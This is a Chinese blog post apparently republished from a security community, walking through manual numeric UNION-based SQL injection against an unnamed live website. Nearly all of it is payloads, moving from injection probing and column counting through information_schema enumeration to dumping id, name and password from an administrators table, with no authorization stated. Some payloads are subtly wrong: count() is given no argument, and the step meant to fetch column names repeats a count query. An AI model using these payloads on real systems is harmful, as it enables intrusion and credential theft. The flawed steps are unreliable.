记手工SQL数字回显型注入

admin 2021年9月4日06:36:25评论59 views字数 1347阅读4分29秒阅读模式

前言

已经检测出该网站有sql注入问题,试着手工注入网站,顺便再复习一下。


01

正文


1.先通过引号 判断该网站为数字型,payload直接拼接,无需引号闭合,当网站后直接构造拼接 and 0# 网站文章列表内容受到影响显示空白,此为回显类型注入


记手工SQL数字回显型注入


payload:and 0#


2.进行字段数的猜解,确定回显位


字段数猜解通过payload:ORDER BY X # 对X字段进行回显字段值猜解,此网站X=6时,网站显示正常则确定回显字段数为6


构造payload:UNION SELECT 1,2,3,4,5,6# 确定回显位为2,6选择其一即可


记手工SQL数字回显型注入


确定回显位:payload:UNION SELECT 1,2,3,4,5,6#


3.进网站进行信息收集payload:UNION SELECT 1,database(),3,4,5,6# 对第二位字段进行函数替换可收集网站数据库相关信息如:version() 数据库版本信息 @@basedirmysql安装路径等


记手工SQL数字回显型注入


4.获取表数量,通过上一步得到mysql数据库版本大于5.1,可以通过MySQL的information_schema数据库进行数据获取


记手工SQL数字回显型注入


payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #


5.获取表名


记手工SQL数字回显型注入


payload:UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #


6.获取数据库表字段数


记手工SQL数字回显型注入


payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #


7.获取数据库表字段名


记手工SQL数字回显型注入


payload:UNION SELECT 1,count(*),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #


8.获取表数据


记手工SQL数字回显型注入


payload:UNION SELECT 1,group_concat(concat(id,name,password)),3,4,5,6 FROM administrators LIMIT 0,1 #


说明

以mysql数据库,数字回显类型进行sql手工注入流程,仅供参考


记手工SQL数字回显型注入

【火线短视频精选】


【周度激励】2021.8.2 ~ 2021.8.8公告


记手工SQL数字回显型注入



【相关精选文章】


vip业务权限漏洞挖掘入门姿势实战


洞态IAST Python探针内测版发布


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火线小助手]加入。


我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!


欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!

记手工SQL数字回显型注入

记手工SQL数字回显型注入

本文始发于微信公众号(火线Zone):记手工SQL数字回显型注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日06:36:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记手工SQL数字回显型注入http://cn-sec.com/archives/462340.html

发表评论

匿名网友 填写信息